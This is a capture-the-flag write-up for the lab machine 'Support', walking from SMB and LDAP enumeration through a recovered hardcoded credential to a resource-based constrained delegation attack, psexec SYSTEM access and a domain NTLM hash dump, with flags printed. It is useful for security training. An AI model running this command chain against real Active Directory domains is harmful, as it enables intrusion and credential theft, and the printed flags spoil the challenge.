Support

Recon

nmap_scan.log
Open 10.129.124.77:53
Open 10.129.124.77:88
Open 10.129.124.77:135
Open 10.129.124.77:139
Open 10.129.124.77:389
Open 10.129.124.77:445
Open 10.129.124.77:464
Open 10.129.124.77:593
Open 10.129.124.77:3268
Open 10.129.124.77:3269
Open 10.129.124.77:5985
Open 10.129.124.77:9389
Open 10.129.124.77:49667
Open 10.129.124.77:49664
Open 10.129.124.77:49678
Open 10.129.124.77:49690
Open 10.129.124.77:49707
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.124.77

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-13 23:33:53Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49678/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49707/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 6187/tcp): CLEAN (Timeout)
|   Check 2 (port 46929/tcp): CLEAN (Timeout)
|   Check 3 (port 10754/udp): CLEAN (Timeout)
|   Check 4 (port 24264/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 0s
| smb2-time: 
|   date: 2024-12-13T23:34:47
|_  start_date: N/A

SMB

└─$ netexec smb 10.129.124.77 -u 'guest' -p '' --shares
SMB         10.129.124.77   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.129.124.77   445    DC               [+] support.htb\guest:
SMB         10.129.124.77   445    DC               [*] Enumerated shares
SMB         10.129.124.77   445    DC               Share           Permissions     Remark
SMB         10.129.124.77   445    DC               -----           -----------     ------
SMB         10.129.124.77   445    DC               ADMIN$                          Remote Admin
SMB         10.129.124.77   445    DC               C$                              Default share
SMB         10.129.124.77   445    DC               IPC$            READ            Remote IPC
SMB         10.129.124.77   445    DC               NETLOGON                        Logon server share
SMB         10.129.124.77   445    DC               support-tools   READ            support staff tools
SMB         10.129.124.77   445    DC               SYSVOL                          Logon server share

For some reason the spider_plus module refused to download the files, so smbclient was used instead:

└─$ netexec smb 10.129.124.77 -u 'letmein' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
└─$ smbclient -N //10.129.124.77/support-tools
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 959152 blocks available
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (432.2 KiloBytes/sec) (average 432.2 KiloBytes/sec)
smb: \> exit

└─$ unzip UserInfo.exe.zip -d userinfo

Decompile it with an online decompiler: https://www.decompiler.com/jar/6f637a8b6b6d41509e4eb8f2e013227a/UserInfo.exe

└─$ unzip UserInfo.exe_Decompiler.com.zip -d decompiled

The password is hardcoded in the executable:

// decompiled/UserInfo.Services/LdapQuery.cs
	public LdapQuery()
	{
		string password = Protected.getPassword();
		entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
		entry.AuthenticationType = (AuthenticationTypes)1;
		ds = new DirectorySearcher(entry);
	}

// decompiled/UserInfo.Services/Protected.cs
using System;
using System.Text;

namespace UserInfo.Services;

internal class Protected {
	private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
	private static byte[] key = Encoding.ASCII.GetBytes("armando");

	public static string getPassword() {
		byte[] array = Convert.FromBase64String(enc_password);
		// array2 is an alias of array, so the loop rewrites the buffer in place
		byte[] array2 = array;
		for (int i = 0; i < array.Length; i++) {
			// repeating-key XOR with "armando", then XOR with the constant 0xDF
			array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
		}
		return Encoding.Default.GetString(array2);
	}
}

Decrypt it with an online C# runner:

// https://www.programiz.com/csharp-programming/online-compiler/
using System;
using System.Text; 

internal class Protected {
	private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
	private static byte[] key = Encoding.ASCII.GetBytes("armando");

	public static void Main(string[] args) {
		byte[] array = Convert.FromBase64String(enc_password);
		byte[] array2 = array;
		for (int i = 0; i < array.Length; i++) {
			array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
		}
		Console.WriteLine(Encoding.Default.GetString(array2));
	}
}
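The same routine reimplemented offline in Python, as an added example that is not code from the writeup or from the UserInfo tool, so the blob never has to be pasted into a third-party runner. The constants are copied from the decompiled class above; the second function shows why the extra `^ 0xDF` step adds nothing, since it folds into the key.

```python
import base64

# Values copied from the decompiled Protected class shown above.
ENC_PASSWORD = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = b"armando"
CONSTANT = 0xDF


def get_password(enc_b64: str = ENC_PASSWORD, key: bytes = KEY) -> str:
    """Reverse Protected.getPassword(): base64-decode, then XOR each byte with
    the repeating key and with 0xDF. XOR is self-inverse, so the decryption
    loop is identical to the one that produced the blob."""
    data = base64.b64decode(enc_b64)
    plain = bytes((b ^ key[i % len(key)]) ^ CONSTANT for i, b in enumerate(data))
    # Encoding.Default on a Western-locale Windows host is cp1252; for an
    # all-ASCII result it is identical to ASCII.
    return plain.decode("cp1252")


def effective_key(key: bytes = KEY, constant: int = CONSTANT) -> bytes:
    """XORing with key[i] and then with a constant equals XORing once with
    key[i] ^ constant, so the 0xDF step does not strengthen the scheme."""
    return bytes(k ^ constant for k in key)


def decode_with_effective_key(enc_b64: str = ENC_PASSWORD) -> str:
    """Same plaintext as get_password() using only the folded key. Everything
    needed to recover the secret ships inside the binary, which is why a
    hardcoded, XOR-obfuscated credential offers no real protection."""
    data = base64.b64decode(enc_b64)
    ek = effective_key()
    return bytes(b ^ ek[i % len(ek)] for i, b in enumerate(data)).decode("cp1252")


if __name__ == "__main__":
    print(get_password())
```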

The credentials are valid.

└─$ netexec smb 10.129.124.77 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
SMB         10.129.124.77   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.129.124.77   445    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

└─$ cicada-mastertul -t 10.129.124.77 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb --full
[!x!] Scanning 10.129.124.77
[!] Enumerating SMB...
 netexec smb 10.129.124.77 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --shares
[-] Could not connect to SMB
[!] Connecting to WinRM...
 netexec winrm 10.129.124.77 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/bloodhound_results
[!] Enumerating LDAP...
ldapdomaindump -u 'support.htb\ldap'  -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -dc-ip 10.129.124.77 -o /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/ldap_results
[+] LDAP saved to /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/ldap_results
 [!x!] Cleaning up...

The support user seems to be the entry point into the DC, but ldapdomaindump returns nothing valuable about it.

└─$ netexec ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --query "(sAMAccountName=support)" ""
SMB         10.129.124.77   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
LDAP        10.129.124.77   389    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP        10.129.124.77   389    DC               [+] Response for object: CN=support,CN=Users,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               objectClass:         top person organizationalPerson user
LDAP        10.129.124.77   389    DC               cn:                  support
LDAP        10.129.124.77   389    DC               c:                   US
LDAP        10.129.124.77   389    DC               l:                   Chapel Hill
LDAP        10.129.124.77   389    DC               st:                  NC
LDAP        10.129.124.77   389    DC               postalCode:          27514
LDAP        10.129.124.77   389    DC               distinguishedName:   CN=support,CN=Users,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               instanceType:        4
LDAP        10.129.124.77   389    DC               whenCreated:         20220528111200.0Z
LDAP        10.129.124.77   389    DC               whenChanged:         20220528111201.0Z
LDAP        10.129.124.77   389    DC               uSNCreated:          12617
LDAP        10.129.124.77   389    DC               info:                Ironside47pleasure40Watchful
LDAP        10.129.124.77   389    DC               memberOf:            CN=Shared Support Accounts,CN=Users,DC=support,DC=htb CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               uSNChanged:          12630
LDAP        10.129.124.77   389    DC               company:             support
LDAP        10.129.124.77   389    DC               streetAddress:       Skipper Bowles Dr
LDAP        10.129.124.77   389    DC               name:                support
LDAP        10.129.124.77   389    DC               objectGUID:          0x0aa33931fa3130459ea48053b396a7f1
LDAP        10.129.124.77   389    DC               userAccountControl:  66048
LDAP        10.129.124.77   389    DC               badPwdCount:         1
LDAP        10.129.124.77   389    DC               codePage:            0
LDAP        10.129.124.77   389    DC               countryCode:         0
LDAP        10.129.124.77   389    DC               badPasswordTime:     133786086568708877
LDAP        10.129.124.77   389    DC               lastLogoff:          0
LDAP        10.129.124.77   389    DC               lastLogon:           0
LDAP        10.129.124.77   389    DC               pwdLastSet:          132982099209777070
LDAP        10.129.124.77   389    DC               primaryGroupID:      513
LDAP        10.129.124.77   389    DC               objectSid:           0x0105000000000005150000001bdbfd6381ba83c9e670420b51040000
LDAP        10.129.124.77   389    DC               accountExpires:      9223372036854775807
LDAP        10.129.124.77   389    DC               logonCount:          0
LDAP        10.129.124.77   389    DC               sAMAccountName:      support
LDAP        10.129.124.77   389    DC               sAMAccountType:      805306368
LDAP        10.129.124.77   389    DC               objectCategory:      CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               dSCorePropagationData: 20220528111201.0Z 16010101000000.0Z
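To read output like this more systematically, here is an added Python example (not part of the original writeup) that parses the netexec attribute lines, decodes the userAccountControl bits and FILETIME values, and flags what an AD auditor would care about in this object. The sample lines are copied from the query above; the flag table covers only a subset of userAccountControl bits.

```python
from __future__ import annotations
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: a subset of the netexec LDAP output shown above.
SAMPLE = """\
LDAP        10.129.124.77   389    DC               [+] Response for object: CN=support,CN=Users,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               info:                Ironside47pleasure40Watchful
LDAP        10.129.124.77   389    DC               memberOf:            CN=Shared Support Accounts,CN=Users,DC=support,DC=htb CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               userAccountControl:  66048
LDAP        10.129.124.77   389    DC               pwdLastSet:          132982099209777070
LDAP        10.129.124.77   389    DC               accountExpires:      9223372036854775807
LDAP        10.129.124.77   389    DC               sAMAccountName:      support
"""

# Subset of userAccountControl bits (ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
NEVER = 9223372036854775807  # "never expires" sentinel
LINE_RE = re.compile(r"^LDAP\s+\S+\s+\d+\s+\S+\s+(\w+):\s+(.*)$")

def parse_netexec_ldap(text: str) -> dict[str, str]:
    """Collect 'attribute: value' pairs; status lines like '[+] ...' are skipped."""
    attrs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            attrs[m.group(1)] = m.group(2).strip()
    return attrs

def decode_uac(value: int) -> list[str]:
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def filetime_to_datetime(value: int):
    """Windows FILETIME: 100-ns ticks since 1601-01-01 UTC; 0 and NEVER mean unset."""
    if value in (0, NEVER):
        return None
    return FILETIME_EPOCH + timedelta(microseconds=value // 10)

def audit(attrs: dict[str, str]) -> list[str]:
    """Findings a reviewer would raise about this account object."""
    findings = []
    flags = decode_uac(int(attrs.get("userAccountControl", "0")))
    if "DONT_EXPIRE_PASSWORD" in flags:
        findings.append("password never expires")
    if attrs.get("info"):
        # info/description are readable by every authenticated user: never store secrets there
        findings.append("info attribute populated (world-readable free text)")
    if "CN=Remote Management Users" in attrs.get("memberOf", ""):
        findings.append("member of Remote Management Users (WinRM logon allowed)")
    return findings
```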

WinRM

The info field looks like a password.

└─$ netexec winrm support.htb -u 'support' -p 'Ironside47pleasure40Watchful'
WINRM       10.129.124.77   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM       10.129.124.77   5985   DC               [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)

└─$ evil-winrm -i support.htb -u 'support' -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Documents> whoami /all

User Name       SID
=============== =============================================
support\support S-1-5-21-1677581083-3380853377-188903654-1105

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
SUPPORT\Shared Support Accounts            Group            S-1-5-21-1677581083-3380853377-188903654-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\support> cat Desktop/user.txt
71858ae992c4a296f17291fbc5e37185

Privilege Escalation

Enumerate with BloodHound.

└─$ bloodhound-python -u 'support' -p 'Ironside47pleasure40Watchful' -d support.htb -ns 10.129.124.77 -c All --zip -op support

Shadow Credentials attack was the first thing I tried, but it failed.

└─$ certipy-ad shadow auto -u 'support@support.htb' -p 'Ironside47pleasure40Watchful' -account Administrator -target dc.support.htb -dc-ip 10.129.124.77 -scheme ldap
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'Administrator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '5e6222be-4b48-9b34-ac4d-63007d37e624'
[*] Adding Key Credential with device ID '5e6222be-4b48-9b34-ac4d-63007d37e624' to the Key Credentials for 'Administrator'
[-] Could not update Key Credentials for 'Administrator' due to insufficient access rights: 00002098: SecErr: DSID-03151473, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

Let's abuse delegations then, following "A Practical Guide To RBCD Exploitation".

└─$ impacket-addcomputer -computer-name 'letmein$' -dc-ip 10.129.124.77 support.htb/support:'Ironside47pleasure40Watchful'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account letmein$ with password RSdLRUaAqDspQoTwGSeRmHco7AeJGCGh.

└─$ impacket-rbcd -delegate-to 'DC$' -delegate-from 'letmein$' -dc-ip 10.129.124.77 -action write support.htb/support:'Ironside47pleasure40Watchful'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] letmein$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     letmein$     (S-1-5-21-1677581083-3380853377-188903654-6101)

└─$ impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.129.124.77 'support.htb/letmein$:RSdLRUaAqDspQoTwGSeRmHco7AeJGCGh'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

└─$ export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

Login 1

└─$ impacket-psexec -k -no-pass support.htb/administrator@dc.support.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file ONvjjNcN.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service QXkm on dc.support.htb.....
[*] Starting service QXkm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Login 2

└─$ impacket-secretsdump -k -no-pass support.htb/Administrator@dc.support.htb -just-dc-ntlm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
ldap:1104:aad3b435b51404eeaad3b435b51404ee:b735f8c7172b49ca2b956b8015eb2ebe:::
support:1105:aad3b435b51404eeaad3b435b51404ee:11fbaef07d83e3f6cde9f0ff98a3af3d:::
smith.rosario:1106:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
hernandez.stanley:1107:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
wilson.shelby:1108:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
anderson.damian:1109:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
thomas.raphael:1110:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
levine.leopoldo:1111:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
raven.clifton:1112:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
bardot.mary:1113:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
cromwell.gerard:1114:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
monroe.david:1115:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
west.laura:1116:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
langley.lucy:1117:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
daughtler.mabel:1118:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
stoll.rachelle:1119:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
ford.victoria:1120:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:fa894c2f0c6fa6aade22d50f19729873:::
letmein$:6101:aad3b435b51404eeaad3b435b51404ee:115b37daa4edb2ffb788bed030639f42:::
[*] Cleaning up...

└─$ evil-winrm -i support.htb -u 'administrator' -H 'bb06cbc02b39abeddd1335bc30b19e26'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
support\administrator

Root.txt

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
15f69c27b77961d2a1a3934619eaf05a
